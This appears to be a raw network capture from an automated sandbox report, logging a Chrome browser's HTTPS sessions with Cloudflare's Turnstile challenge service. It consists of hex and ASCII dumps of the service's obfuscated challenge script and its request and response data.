                                                                                                    2025-01-14 17:37:59 UTC1369INData Raw: 66 6a 3d 66 69 2c 65 4d 5b 67 4a 28 37 33 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 2c 68 72 2c 6f 2c 78 2c 42 2c 43 2c 44 2c 45 2c 48 2c 46 29 7b 69 66 28 68 72 3d 67 4a 2c 6f 3d 7b 27 75 7a 4d 4b 56 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 63 55 67 71 52 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 2c 4a 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 2c 4a 29 7d 2c 27 6e 42 75 47 46 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 54 58 72 65 62 27 3a 68 72 28 36 33 37 29 2c 27 58 6b 5a 79 4b 27 3a 68 72 28 31 38 32 39 29 2c 27 52 5a 51 53 76 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 64 59 75 75 58 27
                                                                                                    Data Ascii: fj=fi,eM[gJ(736)]=function(g,h,i,j,hr,o,x,B,C,D,E,H,F){if(hr=gJ,o={'uzMKV':function(G,H){return G+H},'cUgqR':function(G,H,I,J){return G(H,I,J)},'nBuGF':function(G,H){return G(H)},'TXreb':hr(637),'XkZyK':hr(1829),'RZQSv':function(G,H){return G===H},'dYuuX'
                                                                                                    2025-01-14 17:37:59 UTC1369INData Raw: 29 5d 28 69 29 2c 6d 3d 30 3b 6d 3c 6c 5b 68 76 28 31 36 37 34 29 5d 3b 6d 2b 2b 29 69 66 28 68 76 28 39 33 32 29 3d 3d 3d 68 76 28 38 32 38 29 29 6d 5b 68 76 28 31 36 33 38 29 5d 5b 68 76 28 31 32 30 36 29 5d 28 6b 5b 68 76 28 36 37 38 29 5d 29 3b 65 6c 73 65 20 69 66 28 6e 3d 6c 5b 6d 5d 2c 6b 5b 68 76 28 31 37 35 37 29 5d 28 27 66 27 2c 6e 29 26 26 28 6e 3d 27 4e 27 29 2c 68 5b 6e 5d 29 7b 66 6f 72 28 6f 3d 30 3b 6f 3c 69 5b 6c 5b 6d 5d 5d 5b 68 76 28 31 36 37 34 29 5d 3b 2d 31 3d 3d 3d 68 5b 6e 5d 5b 68 76 28 31 36 36 34 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 26 26 28 66 6f 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 7c 7c 68 5b 6e 5d 5b 68 76 28 31 33 36 33 29 5d 28 6b 5b 68 76 28 38 33 30 29 5d 28 27 6f 2e 27 2c 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 29 29 2c
                                                                                                    Data Ascii: )](i),m=0;m<l[hv(1674)];m++)if(hv(932)===hv(828))m[hv(1638)][hv(1206)](k[hv(678)]);else if(n=l[m],k[hv(1757)]('f',n)&&(n='N'),h[n]){for(o=0;o<i[l[m]][hv(1674)];-1===h[n][hv(1664)](i[l[m]][o])&&(fo(i[l[m]][o])||h[n][hv(1363)](k[hv(830)]('o.',i[l[m]][o]))),
                                                                                                    2025-01-14 17:37:59 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 69 64 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 49 29 7b 6b 3d 28 69 64 3d 67 4a 2c 6a 3d 7b 7d 2c 6a 5b 69 64 28 39 36 34 29 5d 3d 69 64 28 31 37 32 33 29 2c 6a 5b 69 64 28 39 30 36 29 5d 3d 69 64 28 39 34 33 29 2c 6a 5b 69 64 28 36 35 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 7d 2c 6a 5b 69 64 28 31 38 32 32 29 5d 3d 69 64 28 31 33 31 35 29 2c 6a 5b 69 64 28 38 34 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 7c 7c 48 7d 2c 6a 5b 69 64 28 31 33 32 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 69 64 28 31 38 30 39 29
                                                                                                    Data Ascii: function(g,h,i,id,j,k,l,m,n,o,s,x,B,C,D,E,F,I){k=(id=gJ,j={},j[id(964)]=id(1723),j[id(906)]=id(943),j[id(654)]=function(G,H){return G instanceof H},j[id(1822)]=id(1315),j[id(845)]=function(G,H){return G||H},j[id(1320)]=function(G,H){return G+H},j[id(1809)


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    29192.168.2.563869104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:00 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=901f65a8b89443b1&lang=auto HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    Accept: */*
                                                                                                    Sec-Fetch-Site: none
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:00 UTC331INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:38:00 GMT
                                                                                                    Content-Type: application/javascript; charset=UTF-8
                                                                                                    Content-Length: 123690
                                                                                                    Connection: close
                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f65b2daaa429b-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:38:00 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                                                                    2025-01-14 17:38:00 UTC1369INData Raw: 73 65 72 25 32 30 74 6f 25 32 30 76 69 65 77 25 32 30 74 68 69 73 25 32 30 73 69 74 65 25 32 30 70 72 6f 70 65 72 6c 79 2e 25 33 43 62 72 25 32 46 25 33 45 25 33 43 61 25 32 30 74 61 72 67 65 74 25 33 44 25 32 32 5f 62 6c 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32
                                                                                                    Data Ascii: ser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%2
                                                                                                    2025-01-14 17:38:00 UTC1369INData Raw: 2c 67 38 2c 67 39 2c 67 7a 2c 67 41 2c 67 45 2c 67 46 2c 67 47 2c 67 48 2c 67 36 2c 67 37 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 31 31 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 37 35 31 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 30 34 29 29 2f 33 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 31 36 33 38 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 36 36 38 29 29 2f 35 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 37 34 32 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 36 36 29 29 2f 37 2a 28 70 61 72 73 65 49 6e 74 28 67
                                                                                                    Data Ascii: ,g8,g9,gz,gA,gE,gF,gG,gH,g6,g7){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1411))/1*(parseInt(gI(751))/2)+-parseInt(gI(704))/3*(parseInt(gI(1638))/4)+-parseInt(gI(668))/5+-parseInt(gI(1742))/6+-parseInt(gI(1366))/7*(parseInt(g
                                                                                                    2025-01-14 17:38:00 UTC1369INData Raw: 28 27 7c 27 29 2c 6d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 6c 5b 6d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 6f 3d 28 6e 3d 7b 7d 2c 6e 5b 67 4d 28 32 39 31 29 5d 3d 67 2c 6e 5b 67 4d 28 39 32 30 29 5d 3d 44 2c 6e 2e 63 63 3d 68 2c 6e 5b 67 4d 28 31 30 36 34 29 5d 3d 46 2c 6e 5b 67 4d 28 31 30 34 37 29 5d 3d 48 2c 4a 53 4f 4e 5b 67 4d 28 36 36 33 29 5d 28 6e 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 73 5b 67 4d 28 31 37 35 37 29 5d 3d 35 65 33 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 73 5b 67 4d 28 36 39 32 29 5d 28 6b 5b 67 4d 28 37 36 33 29 5d 2c 67 4d 28 31 37 33 35 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 73 3d 6e 65 77 20 65 4d 5b 28 67 4d 28 38 38 30 29 29 5d 28 29 3b 63 6f 6e 74 69 6e 75
                                                                                                    Data Ascii: ('|'),m=0;!![];){switch(l[m++]){case'0':o=(n={},n[gM(291)]=g,n[gM(920)]=D,n.cc=h,n[gM(1064)]=F,n[gM(1047)]=H,JSON[gM(663)](n));continue;case'1':s[gM(1757)]=5e3;continue;case'2':s[gM(692)](k[gM(763)],gM(1735));continue;case'3':s=new eM[(gM(880))]();continu
                                                                                                    2025-01-14 17:38:00 UTC1369INData Raw: 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2d 6f 7d 2c 27 65 61 7a 6c 79 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 25 6f 7d 2c 27 4f 6f 57 64 6a 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 26 6f 7d 2c 27 45 72 62 52 73 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 3e 6f 7d 2c 27 74 42 7a 4f 78 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 7d 2c 27 4c 4b 70 6a 70 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 3d 3d 6e 7d 2c 27 6e 4d 70 44 69 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 6f 7d 2c 27 4d 4b 67 47 53 27 3a 66 75 6e 63 74 69 6f 6e
                                                                                                    Data Ascii: ion(n,o){return n-o},'eazly':function(n,o){return n%o},'OoWdj':function(n,o){return n&o},'ErbRs':function(n,o){return n>>o},'tBzOx':function(n,o){return n instanceof o},'LKpjp':function(n,o){return o===n},'nMpDi':function(n,o){return n>o},'MKgGS':function
                                                                                                    2025-01-14 17:38:00 UTC1369INData Raw: 74 75 72 6e 20 6e 2b 6f 7d 2c 27 51 7a 48 6a 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 49 52 53 6d 4c 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 2b 6f 7d 2c 27 6c 6f 6f 71 69 27 3a 67 50 28 34 37 36 29 2c 27 48 69 46 67 61 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 2c 73 29 7b 72 65 74 75 72 6e 20 6e 28 6f 2c 73 29 7d 2c 27 56 66 4e 62 68 27 3a 67 50 28 31 36 34 35 29 2c 27 7a 56 55 49 64 27 3a 67 50 28 39 38 39 29 2c 27 56 55 78 56 62 27 3a 67 50 28 31 30 38 36 29 2c 27 68 6a 49 6e 68 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 20 69 6e 73 74 61 6e 63 65 6f 66 20 6f 7d 2c 27 49 65 56 6d 48 27 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72
                                                                                                    Data Ascii: turn n+o},'QzHjl':function(n,o){return n+o},'IRSmL':function(n,o){return n+o},'looqi':gP(476),'HiFga':function(n,o,s){return n(o,s)},'VfNbh':gP(1645),'zVUId':gP(989),'VUxVb':gP(1086),'hjInh':function(n,o){return n instanceof o},'IeVmH':function(n,o){retur
                                                                                                    2025-01-14 17:38:00 UTC1369INData Raw: 32 34 35 29 2c 32 35 36 29 2c 32 35 35 29 2c 31 32 32 29 2c 74 68 69 73 2e 68 5b 69 5b 67 50 28 39 35 32 29 5d 28 6f 2c 74 68 69 73 2e 67 29 5d 3d 64 5b 67 50 28 31 30 34 30 29 5d 28 74 68 69 73 2c 73 29 29 3a 28 6c 3d 7b 7d 2c 6c 5b 67 50 28 31 37 34 30 29 5d 3d 64 2c 6c 5b 67 50 28 31 30 38 34 29 5d 3d 65 2c 6c 5b 67 50 28 31 34 33 32 29 5d 3d 66 2c 6c 5b 67 50 28 31 33 36 33 29 5d 3d 67 2c 6c 5b 67 50 28 33 33 37 29 5d 3d 68 2c 6d 3d 6c 2c 65 4d 5b 67 50 28 31 34 30 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 52 29 7b 67 52 3d 67 50 2c 65 4d 5b 67 52 28 36 34 38 29 5d 28 6d 2c 75 6e 64 65 66 69 6e 65 64 2c 69 5b 67 52 28 31 33 30 35 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 67 50 28 31 34 30 33 29 5d 28 66 75 6e 63 74 69 6f 6e 28 67 53 2c 73 2c 76 2c 78 2c 42
                                                                                                    Data Ascii: 245),256),255),122),this.h[i[gP(952)](o,this.g)]=d[gP(1040)](this,s)):(l={},l[gP(1740)]=d,l[gP(1084)]=e,l[gP(1432)]=f,l[gP(1363)]=g,l[gP(337)]=h,m=l,eM[gP(1403)](function(gR){gR=gP,eM[gR(648)](m,undefined,i[gR(1305)])},10),eM[gP(1403)](function(gS,s,v,x,B
                                                                                                    2025-01-14 17:38:00 UTC1369INData Raw: 5b 67 53 28 33 33 37 29 5d 3d 61 69 5b 67 53 28 36 36 33 29 5d 28 61 6a 5b 67 53 28 33 33 37 29 5d 2c 61 6b 5b 67 53 28 34 31 34 29 5d 28 61 6c 5b 67 53 28 33 33 37 29 5d 29 29 3a 61 6d 5b 67 53 28 33 33 37 29 5d 3d 61 6e 5b 67 53 28 36 36 33 29 5d 28 61 6f 5b 67 53 28 33 33 37 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 35 27 3a 4a 5b 67 53 28 36 39 32 29 5d 28 67 53 28 36 38 36 29 2c 67 53 28 31 37 33 35 29 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 2c 31 65 33 29 2c 65 4d 5b 67 50 28 31 36 36 33 29 5d 5b 67 50 28 34 36 39 29 5d 28 67 50 28 34 35 33 29 2c 64 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 65 51 3d 30 2c 65 54 3d 7b 7d 2c 65 54 5b 67 4a 28 33 38 39 29 5d 3d 65 53 2c 65 4d 5b 67 4a 28 37 31 33 29 5d 3d 65 54 2c 65 56 3d
                                                                                                    Data Ascii: [gS(337)]=ai[gS(663)](aj[gS(337)],ak[gS(414)](al[gS(337)])):am[gS(337)]=an[gS(663)](ao[gS(337)]);continue;case'15':J[gS(692)](gS(686),gS(1735));continue}break}},1e3),eM[gP(1663)][gP(469)](gP(453),d));return![]},eQ=0,eT={},eT[gJ(389)]=eS,eM[gJ(713)]=eT,eV=
                                                                                                    2025-01-14 17:38:00 UTC1369INData Raw: 3d 66 4e 2c 66 53 5b 67 4a 28 31 36 37 37 29 5d 3d 66 4b 2c 66 53 5b 67 4a 28 39 35 39 29 5d 3d 66 4a 2c 66 53 5b 67 4a 28 39 33 31 29 5d 3d 66 38 2c 66 53 5b 67 4a 28 31 36 38 39 29 5d 3d 66 46 2c 66 53 5b 67 4a 28 34 35 30 29 5d 3d 66 45 2c 66 53 5b 67 4a 28 35 36 30 29 5d 3d 65 5a 2c 66 53 5b 67 4a 28 31 31 36 33 29 5d 3d 66 30 2c 66 53 5b 67 4a 28 31 34 38 39 29 5d 3d 66 6d 2c 66 53 5b 67 4a 28 31 33 37 31 29 5d 3d 66 6f 2c 66 53 5b 67 4a 28 36 32 32 29 5d 3d 66 6e 2c 66 53 5b 67 4a 28 31 33 38 36 29 5d 3d 66 79 2c 66 53 5b 67 4a 28 31 37 37 35 29 5d 3d 66 78 2c 66 53 5b 67 4a 28 31 30 36 39 29 5d 3d 66 77 2c 66 53 5b 67 4a 28 31 33 31 34 29 5d 3d 66 76 2c 66 53 5b 67 4a 28 31 34 36 30 29 5d 3d 66 67 2c 66 53 5b 67 4a 28 35 39 39 29 5d 3d 66 52 2c 66
                                                                                                    Data Ascii: =fN,fS[gJ(1677)]=fK,fS[gJ(959)]=fJ,fS[gJ(931)]=f8,fS[gJ(1689)]=fF,fS[gJ(450)]=fE,fS[gJ(560)]=eZ,fS[gJ(1163)]=f0,fS[gJ(1489)]=fm,fS[gJ(1371)]=fo,fS[gJ(622)]=fn,fS[gJ(1386)]=fy,fS[gJ(1775)]=fx,fS[gJ(1069)]=fw,fS[gJ(1314)]=fv,fS[gJ(1460)]=fg,fS[gJ(599)]=fR,f
                                                                                                    2025-01-14 17:38:00 UTC1369INData Raw: 5d 28 67 5b 6a 79 28 31 35 38 33 29 5d 5b 6a 79 28 34 31 34 29 5d 28 68 29 29 29 2c 78 3d 67 5b 6a 79 28 31 31 39 32 29 5d 5b 6a 79 28 38 33 34 29 5d 26 26 67 5b 6a 79 28 31 33 37 32 29 5d 3f 67 5b 6a 79 28 31 31 39 32 29 5d 5b 6a 79 28 38 33 34 29 5d 28 6e 65 77 20 67 5b 28 6a 79 28 31 33 37 32 29 29 5d 28 78 29 29 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 6a 41 2c 48 29 7b 66 6f 72 28 6a 41 3d 6a 79 2c 47 5b 6a 41 28 36 33 34 29 5d 28 29 2c 48 3d 30 3b 48 3c 47 5b 6a 41 28 39 31 39 29 5d 3b 47 5b 48 5d 3d 3d 3d 47 5b 6f 5b 6a 41 28 31 32 36 34 29 5d 28 48 2c 31 29 5d 3f 47 5b 6a 41 28 31 33 37 33 29 5d 28 6f 5b 6a 41 28 31 32 30 38 29 5d 28 48 2c 31 29 2c 31 29 3a 48 2b 3d 31 29 3b 72 65 74 75 72 6e 20 47 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73
                                                                                                    Data Ascii: ](g[jy(1583)][jy(414)](h))),x=g[jy(1192)][jy(834)]&&g[jy(1372)]?g[jy(1192)][jy(834)](new g[(jy(1372))](x)):function(G,jA,H){for(jA=jy,G[jA(634)](),H=0;H<G[jA(919)];G[H]===G[o[jA(1264)](H,1)]?G[jA(1373)](o[jA(1208)](H,1),1):H+=1);return G}(x),B='nAsAaAb'.s


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    30192.168.2.563870104.18.94.414437980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-14 17:38:00 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/742099266:1736874938:LOTqLqKgF6f23eQQBzh4nFh3KGrN6LxgtoxOlVeHOJg/901f65a8b89443b1/zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5 HTTP/1.1
                                                                                                    Host: challenges.cloudflare.com
                                                                                                    Connection: keep-alive
                                                                                                    Content-Length: 3179
                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                    Content-type: application/x-www-form-urlencoded
                                                                                                    CF-Chl-RetryAttempt: 0
                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                    CF-Challenge: zWEhW6lEynN2FdofVsOjEqXPlExgBRNDYwEB5or7qb4-1736876279-1.1.1.1-HzTdnRGMDY8.hOMFe9GjX1tAvcxiHa2jETowralYuuiU170BGeX61kJkIm0sZ2p5
                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                    Accept: */*
                                                                                                    Origin: https://challenges.cloudflare.com
                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                    Sec-Fetch-Mode: cors
                                                                                                    Sec-Fetch-Dest: empty
                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/zv890/0x4AAAAAAA0NHG15_jVuz6XI/auto/fbE/normal/auto/
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    2025-01-14 17:38:00 UTC3179OUTData Raw: 76 5f 39 30 31 66 36 35 61 38 62 38 39 34 34 33 62 31 3d 4a 39 56 4f 24 4f 64 4f 55 4f 34 4f 30 47 41 59 47 41 53 4f 47 67 66 6d 62 65 67 41 37 47 7a 7a 41 51 4b 41 66 31 4f 47 43 41 6e 4f 66 56 65 66 38 43 56 41 72 4d 43 41 45 6c 47 2d 4a 41 73 4f 47 53 56 41 66 63 75 39 6b 50 41 63 6d 41 74 41 47 39 41 63 56 68 31 41 4b 41 6b 31 66 7a 41 6d 31 4d 56 41 55 41 66 6d 41 64 56 56 47 37 46 65 76 49 48 34 76 25 32 62 35 52 31 66 4b 71 41 62 56 6b 74 6a 64 48 73 36 57 41 7a 31 6b 52 34 41 56 42 57 63 52 31 41 36 2d 41 41 2d 4f 66 43 4e 38 55 7a 72 69 48 57 45 78 66 65 73 2d 57 48 6d 4e 6d 41 72 42 24 5a 56 56 48 2b 41 4c 67 41 4f 52 42 65 73 62 66 6b 4d 68 46 6d 4f 6f 31 41 6c 38 6c 73 33 55 30 5a 35 79 43 2b 4d 6e 43 47 65 52 53 4d 38 48 69 65 50 69 42 5a 41
                                                                                                    Data Ascii: v_901f65a8b89443b1=J9VO$OdOUO4O0GAYGASOGgfmbegA7GzzAQKAf1OGCAnOfVef8CVArMCAElG-JAsOGSVAfcu9kPAcmAtAG9AcVh1AKAk1fzAm1MVAUAfmAdVVG7FevIH4v%2b5R1fKqAbVktjdHs6WAz1kR4AVBWcR1A6-AA-OfCN8UzriHWExfes-WHmNmArB$ZVVH+ALgAORBesbfkMhFmOo1Al8ls3U0Z5yC+MnCGeRSM8HiePiBZA
                                                                                                    2025-01-14 17:38:01 UTC795INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 14 Jan 2025 17:38:00 GMT
                                                                                                    Content-Type: text/plain; charset=UTF-8
                                                                                                    Content-Length: 155896
                                                                                                    Connection: close
                                                                                                    cf-chl-gen: 2+yxkT/7eS8sHOsWjT7tDcWCDngWrQYooQcvsJELm7v0B07wJRx7lBRxM2mQgs4suWZEU2BWbCAbsTd92jUgjDzLB/vzJx1f+PlGQAn2DclCNCA6ghVVx4QDqx+GNnDMs56BTEbwt3d1ZEFS9PGHJH247KdJ/KKnMi+4nhaxdqipLE+zSEsEVBmVNlSFC8Vv5pH1+83pSwcCVHjvxYY7oHTkPlnybZt/Q1i6ZKQU+sNulDVeGEbAAdZ6bUhnsus6oAjE34ctDonIGt+48atnmbb1BzKngXVnM7hno9f0JuK+kO5fV4yaQmHhq+NjrylRhLqE4zB8k3GosVgUy19KiGJW8diHNbfM3WjOMBmpPtAjyfbA/ongxQxx+f0W+EuwVOBQ5IXluzqlphyyUvQv2xbg+RwqpKCBqwp+tNSNzy7ujpvOc8208LnHfIsLnHcS8polN1xjhGgLnbmryqGF6Irr6LHw1u1KSxGP6qopQ+1Rg1/obtO6RsIm1ATFQ9UTXvQ+2V5h74eTaM3sbBF/fA==$w7yfwRfzwOd1+vS3zRu8Gw==
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 901f65b38c0b1879-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    2025-01-14 17:38:01 UTC574INData Raw: 64 35 75 63 6f 70 57 62 74 4c 4b 43 78 58 32 72 6f 37 75 2b 70 4c 75 69 6b 4b 50 44 74 73 62 57 31 4c 76 49 79 4e 53 58 7a 5a 66 42 30 37 50 42 73 4b 58 42 73 4f 54 58 79 38 71 34 37 63 44 42 7a 4e 43 2f 36 4e 48 46 30 64 6a 78 74 62 48 78 31 65 7a 74 77 50 6d 38 31 65 58 76 78 64 62 56 41 4c 7a 49 35 2b 7a 48 33 50 7a 78 79 73 38 47 2f 65 50 58 39 4f 6a 53 31 76 54 2b 32 4f 6b 62 47 64 7a 74 48 78 30 50 39 43 63 67 2b 2b 51 4f 35 78 77 61 36 66 6b 74 2f 67 33 79 49 6a 6b 78 49 2f 51 6f 47 66 59 52 4f 7a 4d 71 45 53 38 68 4c 68 55 37 4f 55 45 45 43 77 55 6a 51 54 38 4f 51 54 45 69 55 45 63 57 49 53 6f 76 4d 54 77 75 50 31 35 58 55 56 68 62 55 46 31 64 54 30 4a 65 55 79 68 6f 5a 32 46 71 52 30 68 41 63 30 52 31 51 43 31 4b 55 54 4a 55 61 6d 68 7a 62 46 4a
                                                                                                    Data Ascii: d5ucopWbtLKCxX2ro7u+pLuikKPDtsbW1LvIyNSXzZfB07PBsKXBsOTXy8q47cDBzNC/6NHF0djxtbHx1eztwPm81eXvxdbVALzI5+zH3Pzxys8G/ePX9OjS1vT+2OkbGdztHx0P9Ccg++QO5xwa6fkt/g3yIjkxI/QoGfYROzMqES8hLhU7OUEECwUjQT8OQTEiUEcWISovMTwuP15XUVhbUF1dT0JeUyhoZ2FqR0hAc0R1QC1KUTJUamhzbFJ
